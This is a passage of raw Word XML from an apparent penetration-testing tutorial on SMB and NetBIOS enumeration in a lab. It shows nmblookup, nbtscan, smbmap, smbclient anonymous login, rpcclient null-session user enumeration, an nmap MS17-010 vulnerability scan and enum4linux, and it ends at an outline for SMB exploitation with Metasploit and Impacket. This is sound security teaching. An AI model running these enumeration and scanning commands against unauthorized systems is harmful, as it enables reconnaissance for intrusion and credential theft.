    <w:p w14:paraId="33EE0DB1" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E900FEC"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nmblookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFBBA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nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries. The options allow the name queries to be directed at a particular IP broadcast area or to a particular machine. All queries are done over UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618EFD96" w14:textId="5C157A0E"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7FC09BE">
          <v:shape id="_x0000_i1295" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId46" w:name="DefaultOcxName15" w:shapeid="_x0000_i12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5C8F85D7" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45A3505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254ED6B4"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nmblookup -A 192.168.1.103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="090E69C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nmblookup is a helpful command for enumerating domain/workstation and MAC address. NetBIOS work with the help of NetBIOS suffixes as a state following information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FC43D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For unique names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C28AE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00: Workstation Service (workstation name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258BCC7"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03: Windows Messenger service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314F02D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06: Remote Access Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D0F88"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20: File Service (also called Host Record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB99FEF"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21: Remote Access Service client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7239714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1B: Domain Master Browser – Primary Domain Controller for a domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BADE3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1D: Master Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC0441"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For group names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686BF96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00: Workstation Service (workgroup/domain name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114B71FC"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1C: Domain Controllers for a domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16607F4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1E: Browser Service Elections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F009401" w14:textId="66A630B9"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4B0EA772" wp14:editId="6F8BF0EA">
            <wp:extent cx="5229225" cy="1714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9225" cy="1714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A947A"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nbtscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765EC2F1"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is a command utility that tries to scan NetBIOS name servers open on a local or remote TCP/IP network and because it is a first step in finding open shares. It is created on the functionality of the Windows standard tool “nbtstat”, and it works on a whole subnet instead of individual IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C69815A" w14:textId="4ED2512F"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0C3AB010">
          <v:shape id="_x0000_i1294" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId48" w:name="DefaultOcxName14" w:shapeid="_x0000_i12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78BD4DBD" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66941F74"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5B878319"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nbtscan 192.168.1.1/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="115C4EF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 As you can observe it has dumped almost the same result as above, but the most important fact is that it enumerates the whole subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D09A8" w14:textId="7D659812"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4280FBA7" wp14:editId="67387ECE">
            <wp:extent cx="5731510" cy="11633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163320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F783BE9"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SMBMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F373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SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind and is intended to simplify searching for potentially sensitive data across large networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116A741" w14:textId="67C4096E"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9430517">
          <v:shape id="_x0000_i1293" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId50" w:name="DefaultOcxName21" w:shapeid="_x0000_i12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475"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="6D3A2ADB" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D1B33C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179DC72A"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AEE4B89"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smbmap -H 192.168.1.102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42D47FDD"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smbmap -H 192.168.1.102 -d metasploitable -u msfadmin -p msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B8B1123"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As you can observe, this tool not only shows share files even show their permission. If you will notice the second command then you will perceive that it has shown permission for user “msfadmin”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D560A" w14:textId="07402544"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4B2731E0" wp14:editId="1392F14F">
            <wp:extent cx="5731510" cy="32365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6D7A8DE1"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Smbclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A1DF3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smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the FTP program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FBDE07" w14:textId="5D351407"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39B13525">
          <v:shape id="_x0000_i1292" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId52" w:name="DefaultOcxName31" w:shapeid="_x0000_i12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503300FD" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E815EC1"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641CCC08"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6645" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FCC386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smbclient -L 192.168.1.102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="189CBE0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smbclient //192.168.1.102/tmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FB9B9B5"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you can observe with the help of smbclient we are able to view the shared folder of victim’s machine. Moreover, we can use smbclient for sharing the file in the network. Here you can observe we had login successfully using anonymous login and transferred the user.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23163FC1" w14:textId="6AD3A2B9"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5E508CF4" wp14:editId="7764A324">
            <wp:extent cx="5731510" cy="47091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709160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27989147"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Rpcclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A132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rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. It has undergone several stages of development and stability. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548EA30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We can use rpcclient to open an authenticated SMB session to a target machine by running the below command on our system where we have used a NULL Session, as we have entered a username of “”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F10284A" w14:textId="65EAC535"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533C558A">
          <v:shape id="_x0000_i1291" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId54" w:name="DefaultOcxName41" w:shapeid="_x0000_i12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5D0F8DF7" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29E6914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0D60F88A"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6645" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C2B772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rpcclient -U "" -N 192.168.1.102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A864B9D"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enumdomusers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38C624F5"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Further, we had use enumerate user command, and you can see the usernames as well as their RID (the suffix of their SID) in hexadecimal form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248497E2" w14:textId="20377D4C"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4CAA745C" wp14:editId="27667231">
            <wp:extent cx="5124450" cy="637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450" cy="6372225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC37A8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We have to use the queryuser command to catch-all kinds of information related to an individual user based uniquely on the users RID in hex form, here RID: 0x3e8 denotes root user account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3FE363" w14:textId="00821B82"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423ED679">
          <v:shape id="_x0000_i1290" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId56" w:name="DefaultOcxName51" w:shapeid="_x0000_i12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0AEBFA50" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="710300B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1B404035"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queryuser 0x3e8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19EE865D"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 note that the output result shows the last logon time for the user root, as well as the Password last set Time. Such kind of things is very valuable for penetration testers. And, this all can be achieved without an admin username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA55335" w14:textId="41BE3C3B"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7FB6ACC1" wp14:editId="37012391">
            <wp:extent cx="5731510" cy="38950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895090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="577605A6"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Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C392A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Following Script attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADD4F2F" w14:textId="1326727B"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E0E6F49">
          <v:shape id="_x0000_i1289" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId58" w:name="DefaultOcxName61" w:shapeid="_x0000_i12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67E8EBCD" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37337AF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4D022F99"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nmap --script smb-vuln* -p 139,445 192.168.1.103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DAB14E6"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The script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error “STATUS_INSUFF_SERVER_RESOURCES” is returned to determine if the target is not patched against ms17-010. Additionally, it checks for known error codes returned by patched systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DBE4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From the given below image you can observe, it found the target machine is vulnerable to ms17-010 due to SMBv1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A8ED3" w14:textId="3D1BCF84"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2AD01112" wp14:editId="57CF0C68">
            <wp:extent cx="5731510" cy="30791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p>
    <w:p w14:paraId="4A962259"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color w:val="800000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0872C"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Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3E90D5"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It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net, and nmblookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46F9F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Key features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEF8618" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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RID cycling (When RestrictAnonymous is set to 1 on Windows 2000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7FDA4" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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User listing (When RestrictAnonymous is set to 0 on Windows 2000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA5BE3" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Listing of group membership information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433EF19" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Share enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076897E8" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Detecting if the host is in a workgroup or a domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529862A4" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Identifying the remote operating system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D12BB" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Password policy retrieval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F947203" w14:textId="549D53F3"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0B2BB94F">
          <v:shape id="_x0000_i1288" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId60" w:name="DefaultOcxName71" w:shapeid="_x0000_i12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FD1F03" w:rsidRPr="00873D4D" w14:paraId="27B272D9" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE6D45F"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3E6E474F"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enum4linux -a 192.168.1.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03ECBDCF"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you can observe, it has shown target belongs to Workgroup and dump NetBIOS name along with their suffix and much more information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A72E9" w14:textId="3780208B"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2770B00B" wp14:editId="65CAFE06">
            <wp:extent cx="5731510" cy="65106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510655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59571DC6"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Also, perform enumerate user along with their RID in hexadecimal form with the help of rpcclient. Hence enum4linux is Swiss-knife when it comes to performing enumeration. But it cannot identify SMB vulnerability like Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E198E" w14:textId="712D5176"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291E4D25" wp14:editId="7DA9ABB6">
            <wp:extent cx="5731510" cy="6822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6822440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1FE1A" w14:textId="3EF85B8E" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58DD22B6" w14:textId="36898EF0" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563D5977" w14:textId="0A9E00A0" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107EEBFA" w14:textId="702F86E5" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EB84A3"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In this article, we will learn how to connect with victim’s machine via SMB port 445, once you have collected username and password to your victim’s PC. To know how collect username and passwords to your remote host via SMB protocol click </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidRPr="00873D4D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> and to understand what is SMB protocol, click </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="00873D4D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="304C3D61"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Table of Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DB75BF"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Exploiting Windows Server 2008 R2 via SMB through Metasploit inbuilt exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3941137A" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Microsoft Windows Authenticated User Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095092A" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Microsoft Windows Authenticated Powershell Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D3B91" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Microsoft Windows Authenticated Administration Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05330312" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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 Impacket WMI Exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11097167"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Third-party Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250482C" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Impacket (psexec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CED8BF6" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Impacket (exec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F3D40" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Psexec exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D94C5" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Atelier Web Remote Commander</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C11F36"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Exploiting Windows 2007 via SMB through Metasploit inbuilt exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D725B2" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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MS17-010 EternalRomance SMB Remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CDF7A7" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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MS17-010 EternalRomance SMB Remote command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A2A146"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Let’s Begin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7211F1F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Tested on: Windows Server2008 R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357B7987"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Attacking Machine: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF1F4E7"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Microsoft Windows Authenticated User Code Execution</w:t>
      </w:r>
    </w:p>
